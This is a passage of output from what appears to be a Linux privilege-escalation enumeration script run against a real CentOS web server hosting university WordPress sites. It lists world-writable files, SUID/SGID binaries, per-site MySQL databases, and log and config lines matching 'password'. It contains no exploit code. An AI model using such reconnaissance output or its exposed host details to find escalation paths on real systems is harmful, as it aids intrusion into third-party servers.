  2240. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/network.service/cgroup.event_control
  2241. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dovecot.service/cgroup.event_control
  2242. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/webmin.service/cgroup.event_control
  2243. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/postfix.service/cgroup.event_control
  2244. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/rsyslog.service/cgroup.event_control
  2245. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/mailman.service/cgroup.event_control
  2246. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/postgresql.service/cgroup.event_control
  2247. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/NetworkManager-wait-online.service/cgroup.event_control
  2248. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/NetworkManager.service/cgroup.event_control
  2249. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/rhel-dmesg.service/cgroup.event_control
  2250. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-user-sessions.service/cgroup.event_control
  2251. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-update-utmp.service/cgroup.event_control
  2252. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dbus.service/cgroup.event_control
  2253. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/vmware-tools.service/cgroup.event_control
  2254. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/avahi-daemon.service/cgroup.event_control
  2255. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-logind.service/cgroup.event_control
  2256. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/saslauthd.service/cgroup.event_control
  2257. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-tmpfiles-setup.service/cgroup.event_control
  2258. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/auditd.service/cgroup.event_control
  2259. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/rhel-import-state.service/cgroup.event_control
  2260. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/quotaon.service/cgroup.event_control
  2261. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-quotacheck.service/cgroup.event_control
  2262. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/home.mount/cgroup.event_control
  2263. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/boot.mount/cgroup.event_control
  2264. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/lvm2-monitor.service/cgroup.event_control
  2265. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-disk-by\x2did-dm\x2dname\x2dcentos\x2dswap.swap/cgroup.event_control
  2266. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-dm\x2d0.swap/cgroup.event_control
  2267. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-disk-by\x2did-dm\x2duuid\x2dLVM\x2dJ7dZz4eTLW2UFHCRD37o3mIQ3cb9eRc7KOFxiMuBAdJZ4E6rHfysA3owGCuGU5kT.swap/cgroup.event_control
  2268. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-disk-by\x2duuid-7c17174f\x2dabc6\x2d414c\x2d9225\x2d1aa89dc3d427.swap/cgroup.event_control
  2269. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-centos-swap.swap/cgroup.event_control
  2270. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-lvm2\x2dpvscan.slice/cgroup.event_control
  2271. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-journal-flush.service/cgroup.event_control
  2272. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/rhel-readonly.service/cgroup.event_control
  2273. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-mapper-centos\x2dswap.swap/cgroup.event_control
  2274. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
  2275. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-random-seed.service/cgroup.event_control
  2276. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-udev-trigger.service/cgroup.event_control
  2277. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-remount-fs.service/cgroup.event_control
  2278. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-sysctl.service/cgroup.event_control
  2279. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/kmod-static-nodes.service/cgroup.event_control
  2280. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/sys-kernel-config.mount/cgroup.event_control
  2281. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-vconsole-setup.service/cgroup.event_control
  2282. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/-.mount/cgroup.event_control
  2283. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-fsck-root.service/cgroup.event_control
  2284. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-journald.service/cgroup.event_control
  2285. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-hugepages.mount/cgroup.event_control
  2286. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-systemd\x2dfsck.slice/cgroup.event_control
  2287. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-getty.slice/getty@tty1.service/cgroup.event_control
  2288. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-getty.slice/cgroup.event_control
  2289. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-selinux\x2dpolicy\x2dmigrate\x2dlocal\x2dchanges.slice/cgroup.event_control
  2290. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-mqueue.mount/cgroup.event_control
  2291. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/sys-kernel-debug.mount/cgroup.event_control
  2292. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/cgroup.event_control
  2293. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/cgroup.event_control
  2294. -rw-rw-rw- 1 root root 27767 Nov 20 02:04 /var/log/wordpress/wp_incidencias.log
  2295. -rw-rw-rw- 1 root root 3786 Oct 22 02:03 /var/log/wordpress/wp_incidencias.log-20171022.gz
  2296. -rw-rw-rw- 1 root root 8495 Oct 29 02:03 /var/log/wordpress/wp_incidencias.log-20171029.gz
  2297. -rw-rw-rw- 1 root root 8254 Nov 6 02:03 /var/log/wordpress/wp_incidencias.log-20171106.gz
  2298. -rw-rw-rw- 1 root root 9055 Nov 12 02:04 /var/log/wordpress/wp_incidencias.log-20171112.gz
  2299. -rw-rw-rw- 1 root root 8231 Nov 19 02:04 /var/log/wordpress/wp_incidencias.log-20171119.gz
  2300. -rw-rw-rw- 1 programacion programacion 2181659 May 19 2015 /home/servertest/public_html/wp-content/uploads/filebase/Guadalinfo_Diptico-Hackaton_v2c(2).pdf
  2301. -rw-rw-rw- 1 programacion programacion 81069 Sep 26 2014 /home/servertest/public_html/wp-content/uploads/filebase/Jornadas_Acogida.pdf
  2302. -rw-rw-rw- 1 programacion programacion 58732 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/Guideline_CV_EN(2).pdf
  2303. -rw-rw-rw- 1 programacion programacion 70412 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767201.pdf
  2304. -rw-rw-rw- 1 programacion programacion 72972 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767901.pdf
  2305. -rw-rw-rw- 1 programacion programacion 70939 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767304.pdf
  2306. -rw-rw-rw- 1 programacion programacion 389213 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767301.pdf
  2307. -rw-rw-rw- 1 programacion programacion 70194 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767303.pdf
  2308. -rw-rw-rw- 1 programacion programacion 71144 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767209.pdf
  2309. -rw-rw-rw- 1 programacion programacion 71849 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767203.pdf
  2310. -rw-rw-rw- 1 programacion programacion 70923 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767308.pdf
  2311. -rw-rw-rw- 1 programacion programacion 71146 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767207.pdf
  2312. -rw-rw-rw- 1 programacion programacion 70580 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767204.pdf
  2313. -rw-rw-rw- 1 programacion programacion 70602 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767103.pdf
  2314. -rw-rw-rw- 1 programacion programacion 70766 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767202.pdf
  2315. -rw-rw-rw- 1 programacion programacion 70653 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767101.pdf
  2316. -rw-rw-rw- 1 programacion programacion 70848 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767307.pdf
  2317. -rw-rw-rw- 1 programacion programacion 69433 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767306.pdf
  2318. -rw-rw-rw- 1 programacion programacion 71413 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767206.pdf
  2319. -rw-rw-rw- 1 programacion programacion 71257 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767102.pdf
  2320. -rw-rw-rw- 1 programacion programacion 70827 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767208.pdf
  2321. -rw-rw-rw- 1 programacion programacion 69950 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767302.pdf
  2322. -rw-rw-rw- 1 programacion programacion 71346 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767205.pdf
  2323. -rw-rw-rw- 1 programacion programacion 70735 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767305.pdf
  2324. -rw-rw-rw- 1 programacion programacion 116774 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/ElPuerto_ESI.pdf
  2325. -rw-rw-rw- 1 programacion programacion 1201842 Jul 9 2015 /home/servertest/public_html/wp-content/uploads/filebase/PuertoReal_ESI(2).pdf
  2326. -rw-rw-rw- 1 programacion programacion 133401 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/PuertoReal_ESI.pdf
  2327. -rw-rw-rw- 1 programacion programacion 76480 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/Guideline_motivationletter_EN.pdf
  2328. -rw-rw-rw- 1 programacion programacion 267246 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/SanFernando_ESI.pdf
  2329. -rw-rw-rw- 1 programacion programacion 1107723 May 19 2015 /home/servertest/public_html/wp-content/uploads/filebase/dossierterritoriohackathoncadiz.pdf
  2330. -rw-rw-rw- 1 programacion programacion 257265 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/Chiclana_ESI.pdf
  2331. -rw-rw-rw- 1 programacion programacion 150447 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/AcTNet-Internship-summersemester15_2(2).pdf
  2332. -rw-rw-rw- 1 programacion programacion 114345 Oct 20 2014 /home/servertest/public_html/wp-content/uploads/filebase/Cartel LEAN 2014 (UCA-ESI).pdf
  2333. -rw-rw-rw- 1 programacion programacion 150466 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/Cadiz_ESI.pdf
  2334. -rw-rw-rw- 1 programacion programacion 150447 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/AcTNet-Internship-summersemester15_2.pdf
  2335. -rw-rw-rw- 1 programacion programacion 287022 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/Jerez_ESI.pdf
  2336. -rw-rw-rw- 1 programacion programacion 76480 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/Guideline_motivationletter_EN(2).pdf
  2337. -rw-rw-rw- 1 programacion programacion 2181659 May 19 2015 /home/servertest/public_html/wp-content/uploads/filebase/Guadalinfo_Diptico-Hackaton_v2c.pdf
  2338. -rw-rw-rw- 1 programacion programacion 58732 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/Guideline_CV_EN.pdf
  2339. -rw-rw-rw- 1 programacion programacion 34242 Sep 30 2014 /home/servertest/public_html/wp-content/uploads/filebase/706582079_2092012184719.pdf
  2340. -rw-rw-rw- 1 programacion programacion 1574 Sep 29 2015 /home/servertest/public_html/wp-content/uploads/filebase/noticias_rss
  2341.  
  2342. [+] Checking if root's home folder is accessible
  2343.  
  2344. [+] SUID/SGID Files and Directories
  2345. drwxrwsr-x 2 root mailman 60 Apr 1 2017 /run/mailman
  2346. drwxr-sr-x 3 root systemd-journal 60 Apr 1 2017 /run/log/journal
  2347. drwxr-s---+ 2 root systemd-journal 240 Nov 20 16:10 /run/log/journal/fbaa8e75089f4810a59659296fb78a09
  2348. drwxrwsr-x 2 root mailman 80 Nov 20 22:20 /run/lock/mailman
  2349. -rwsr-s---. 1 root root 439 Mar 5 2015 /etc/yum.repos.d/virtualmin.repo
  2350. drwxrwsr-x. 3 root mailman 57 Jul 9 2015 /etc/mailman
  2351. drws--S--- 2 mysql epsalgeciras 19 Jul 9 2015 /var/lib/mysql/epsalgeciras
  2352. drws--S--- 2 mysql epsalgeciras 12288 Sep 15 13:11 /var/lib/mysql/epsalgeciras_wordpress
  2353. drws--S--- 2 mysql imeymat 8192 Sep 12 10:52 /var/lib/mysql/imeymat
  2354. drws--S--- 2 mysql master 19 Mar 28 2016 /var/lib/mysql/master
  2355. drws--S--- 2 mysql master 4096 Nov 20 21:20 /var/lib/mysql/master_wordpress
  2356. drws--S--- 2 mysql gradosindustriales 4096 Dec 16 2016 /var/lib/mysql/gradosindustriales
  2357. drws--S--- 2 mysql ccsociales 19 Jun 7 2016 /var/lib/mysql/ccsociales
  2358. drws--S--- 2 mysql ccsociales 4096 Sep 22 02:01 /var/lib/mysql/ccsociales_wordpress
  2359. drws--S--- 2 mysql ciencias 8192 Sep 22 02:01 /var/lib/mysql/ciencias
  2360. drws--S--- 2 mysql default 49 Aug 2 2016 /var/lib/mysql/default
  2361. drws--S--- 2 mysql iuila 19 Feb 15 2017 /var/lib/mysql/iuila
  2362. drws--S--- 2 mysql iuila 4096 Sep 22 02:00 /var/lib/mysql/iuila_wordpress
  2363. drws--S--- 2 mysql enfyfis 4096 Sep 22 02:02 /var/lib/mysql/enfyfis
  2364. drws--S--- 2 mysql indess 19 May 9 2017 /var/lib/mysql/indess
  2365. drws--S--- 2 mysql indess 4096 Nov 17 08:20 /var/lib/mysql/indess_wordpress
  2366. drws--S--- 2 mysql caiv 4096 Sep 22 02:02 /var/lib/mysql/caiv
  2367. drws--S--- 2 mysql epsalgeciras1 19 Jun 19 13:02 /var/lib/mysql/epsalgeciras1
  2368. drws--S--- 2 mysql epsalgeciras1 16384 Oct 4 11:32 /var/lib/mysql/epsalgeciras1_wordpress
  2369. drws--S--- 2 mysql economicas 4096 Sep 22 02:00 /var/lib/mysql/economicas
  2370. drws--S--- 2 mysql programacion 12288 Oct 27 08:40 /var/lib/mysql/programacion
  2371. drws--S--- 2 mysql masingind 19 Oct 25 10:49 /var/lib/mysql/masingind
  2372. drws--S--- 2 mysql masingind 4096 Oct 25 10:52 /var/lib/mysql/masingind_wordpress
  2373. drwxrwsr-x. 6 root mailman 55 Jun 24 2015 /var/lib/mailman
  2374. drwxrwsr-x. 4 root mailman 33 Jun 24 2015 /var/lib/mailman/archives
  2375. drwxrws---. 4 apache mailman 39 Jun 24 2015 /var/lib/mailman/archives/private
  2376. drwxrwsr-x. 2 root mailman 20 Jun 24 2015 /var/lib/mailman/archives/public
  2377. drwxrwsr-x. 2 root mailman 25 Jul 9 2015 /var/lib/mailman/data
  2378. drwxrwsr-x. 3 root mailman 20 Jun 24 2015 /var/lib/mailman/lists
  2379. drwxrwsr-x. 2 root mailman 45 Nov 20 12:00 /var/lib/mailman/lists/mailman
  2380. drwxrwsr-x. 2 root mailman 6 Jun 24 2015 /var/lib/mailman/spam
  2381. drwxrwsr-x. 11 root mailman 4096 Jun 24 2015 /var/spool/mailman
  2382. drwxrws---. 2 root mailman 6 Mar 5 2015 /var/spool/mailman/virgin
  2383. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/archive
  2384. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/shunt
  2385. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/out
  2386. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/commands
  2387. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/retry
  2388. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/bounces
  2389. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/news
  2390. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/in
  2391. -r-xr-sr-x. 1 root tty 15344 Jun 10 2014 /usr/bin/wall
  2392. -rwsr-xr-x 1 root root 44232 Apr 12 2017 /usr/bin/mount
  2393. -rwsr-xr-x 1 root root 64240 Nov 5 2016 /usr/bin/chage
  2394. -rwsr-xr-x 1 root root 78216 Nov 5 2016 /usr/bin/gpasswd
  2395. -rwsr-xr-x 1 root root 41776 Nov 5 2016 /usr/bin/newgrp
  2396. -rws--x--x 1 root root 23960 Apr 12 2017 /usr/bin/chfn
  2397. -rwsr-xr-x 1 root root 32096 Apr 12 2017 /usr/bin/su
  2398. -rws--x--x 1 root root 23872 Apr 12 2017 /usr/bin/chsh
  2399. -rwsr-xr-x 1 root root 31968 Apr 12 2017 /usr/bin/umount
  2400. -rwxr-sr-x 1 root tty 19536 Apr 12 2017 /usr/bin/write
  2401. ---s--x--x 1 root root 130752 Jun 22 22:02 /usr/bin/sudo
  2402. -rwsr-xr-x 1 root root 27680 May 25 21:46 /usr/bin/pkexec
  2403. -rwsr-xr-x 1 root root 57552 Mar 31 2016 /usr/bin/crontab
  2404. -rwxr-sr-x 1 root mail 19800 Nov 20 2015 /usr/bin/lockfile
  2405. ---x--s--x 1 root nobody 306360 Apr 12 2017 /usr/bin/ssh-agent
  2406. -rwsr-xr-x. 1 root root 27832 Jun 10 2014 /usr/bin/passwd
  2407. -rwsr-sr-x. 1 root root 7144 May 10 2007 /usr/bin/procmail-wrapper
  2408. -rwx--s--x 1 root slocate 40512 Nov 5 2016 /usr/bin/locate
  2409. -rwsr-xr-x 1 root root 11224 Nov 6 2016 /usr/sbin/pam_timestamp_check
  2410. -rwsr-xr-x 1 root root 36280 Nov 6 2016 /usr/sbin/unix_chkpwd
  2411. -rwxr-sr-x 1 root root 11224 Apr 12 2017 /usr/sbin/netreport
  2412. -rwsr-xr-x 1 root root 11296 Apr 12 2017 /usr/sbin/usernetctl
  2413. -rwxr-sr-x. 1 root postdrop 218552 Jun 10 2014 /usr/sbin/postdrop
  2414. -rwxr-sr-x. 1 root postdrop 259992 Jun 10 2014 /usr/sbin/postqueue
  2415. -rwsr-xr-x 1 root root 15432 May 25 21:46 /usr/lib/polkit-1/polkit-agent-helper-1
  2416. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/admin
  2417. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/admindb
  2418. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/confirm
  2419. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/create
  2420. -rwxr-sr-x 1 root mailman 11368 Jun 24 2015 /usr/lib/mailman/cgi-bin/edithtml
  2421. -rwxr-sr-x 1 root mailman 11368 Jun 24 2015 /usr/lib/mailman/cgi-bin/listinfo
  2422. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/options
  2423. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/private
  2424. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/rmlist
  2425. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/roster
  2426. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/subscribe
  2427. -rwxr-sr-x 1 root mailman 15592 Jun 24 2015 /usr/lib/mailman/mail/mailman
  2428. -r-sr-xr-x 1 root root 9532 Mar 26 2017 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
  2429. -r-sr-xr-x 1 root root 14320 Mar 26 2017 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
  2430. -rwsr-x--- 1 root dbus 318424 Nov 6 2016 /usr/lib64/dbus-1/dbus-daemon-launch-helper
  2431. -rwx--s--x. 1 root utmp 11192 Jun 10 2014 /usr/libexec/utempter/utempter
  2432. ---x--s--x 1 root ssh_keys 461496 Apr 12 2017 /usr/libexec/openssh/ssh-keysign
  2433. drwxr-sr-x 2 programacion programacion 4096 May 15 2014 /home/servertest/svn
  2434.  
  2435. [+] Logs containing keyword 'password'
  2436. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp.log:CommAmqpListener: [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  2437. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp.log:CommAmqpListener: [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  2438. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-03-26 21:27:45,847|140593386219328|CApplicationContext|initialize|66|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  2439. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-03-26 21:27:45,847|140593386219328|AmqpListenerWorker|run|71|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  2440. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-03-26 21:27:45,847|140593386219328|AmqpListenerWorker|run|79|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  2441. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-03-26 21:27:45,847|140593386219328|CommAmqpListener|main|127|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  2442. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-04-01 01:24:13,922|139661680678720|CApplicationContext|initialize|66|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  2443. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-04-01 01:24:13,922|139661680678720|AmqpListenerWorker|run|71|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  2444. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-04-01 01:24:13,922|139661680678720|AmqpListenerWorker|run|79|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  2445. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-04-01 01:24:13,922|139661680678720|CommAmqpListener|main|127|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  2446.  
  2447. [+] Config files containing keyword 'password'
  2448. /etc/pki/tls/openssl.cnf:# input_password = secret
  2449. /etc/pki/tls/openssl.cnf:# output_password = secret
  2450. /etc/pki/tls/openssl.cnf:challengePassword = A challenge password
  2451. /etc/httpd/conf.d/ssl.conf:# Note that no password is obtained from the user. Every entry in the user
  2452. /etc/httpd/conf.d/ssl.conf:# file needs this password: `xxj31ZMTZzkVA'.
  2453. /etc/dnsmasq.conf:#dhcp-option=encap:175, 191, pass # iSCSI password
  2454. /etc/postfix/main.cf~:# NOTE: if you use this feature for accounts not in the UNIX password
  2455. /etc/postfix/main.cf~:# NOTE: if you use this feature for accounts not in the UNIX password
  2456. /etc/postfix/main.cf~:# NOTE: if you use this feature for accounts not in the UNIX password
  2457. /etc/postfix/main.cf:# NOTE: if you use this feature for accounts not in the UNIX password
  2458. /etc/postfix/main.cf:# NOTE: if you use this feature for accounts not in the UNIX password
  2459. /etc/postfix/main.cf:# NOTE: if you use this feature for accounts not in the UNIX password
  2460. /etc/security/pwquality.conf:# Configuration for systemwide password quality limits
  2461. /etc/security/pwquality.conf:# Number of characters in the new password that must not be present in the
  2462. /etc/security/pwquality.conf:# old password.
  2463. /etc/security/pwquality.conf:# Minimum acceptable size for the new password (plus one if
  2464. /etc/security/pwquality.conf:# The maximum credit for having digits in the new password. If less than 0
  2465. /etc/security/pwquality.conf:# it is the minimum number of digits in the new password.
  2466. /etc/security/pwquality.conf:# The maximum credit for having uppercase characters in the new password.
  2467. /etc/security/pwquality.conf:# password.
  2468. /etc/security/pwquality.conf:# The maximum credit for having lowercase characters in the new password.
  2469. /etc/security/pwquality.conf:# password.
  2470. /etc/security/pwquality.conf:# The maximum credit for having other characters in the new password.
  2471. /etc/security/pwquality.conf:# password.
  2472. /etc/security/pwquality.conf:# password (digits, uppercase, lowercase, others).
  2473. /etc/security/pwquality.conf:# The maximum number of allowed consecutive same characters in the new password.
  2474. /etc/security/pwquality.conf:# new password.
  2475. /etc/pear.conf:a:30:{s:9:"cache_dir";s:19:"/var/cache/php-pear";s:15:"default_channel";s:12:"pear.php.net";s:16:"preferred_mirror";s:12:"pear.php.net";s:13:"remote_config";s:0:"";s:13:"auto_discover";i:0;s:13:"master_server";s:12:"pear.php.net";s:7:"php_dir";s:15:"/usr/share/pear";s:12:"metadata_dir";s:13:"/var/lib/pear";s:7:"doc_dir";s:19:"/usr/share/doc/pear";s:7:"bin_dir";s:8:"/usr/bin";s:8:"data_dir";s:20:"/usr/share/pear-data";s:7:"cfg_dir";s:9:"/etc/pear";s:7:"www_dir";s:13:"/var/www/html";s:8:"test_dir";s:21:"/usr/share/tests/pear";s:8:"temp_dir";s:8:"/var/tmp";s:12:"download_dir";s:18:"/tmp/pear/download";s:7:"php_bin";s:12:"/usr/bin/php";s:10:"php_prefix";s:0:"";s:10:"php_suffix";s:0:"";s:7:"php_ini";s:0:"";s:8:"username";s:0:"";s:8:"password";s:0:"";s:7:"verbose";i:1;s:15:"preferred_state";s:6:"stable";s:5:"umask";i:18;s:9:"cache_ttl";i:3600;s:8:"sig_type";s:3:"gpg";s:7:"sig_bin";s:12:"/usr/bin/gpg";s:9:"sig_keyid";s:0:"";s:10:"sig_keydir";s:13:"/etc/pearkeys";}
  2476. /etc/dovecot/conf.d/10-auth.conf:# We also try to handle password changes automatically: If user's previous
  2477. /etc/dovecot/conf.d/10-auth.conf:# TTL for negative hits (user not found, password mismatch).
  2478. /etc/dovecot/conf.d/10-auth.conf:# Password database is used to verify user's password (and nothing more).
  2479. /etc/dovecot/conf.d/10-auth.conf:#!include auth-checkpassword.conf.ext
  2480. /etc/dovecot/conf.d/10-logging.conf:# In case of password mismatches, log the attempted password. Valid values are
  2481. /etc/dovecot/conf.d/10-logging.conf:# no, plain and sha1. sha1 can be useful for detecting brute force password
  2482. /etc/dovecot/conf.d/10-logging.conf:# attempts vs. user simply trying the same password over and over again.
  2483. /etc/dovecot/conf.d/10-logging.conf:#auth_verbose_passwords = no
  2484. /etc/dovecot/conf.d/10-logging.conf:# In case of password mismatches, log the passwords and used scheme so the
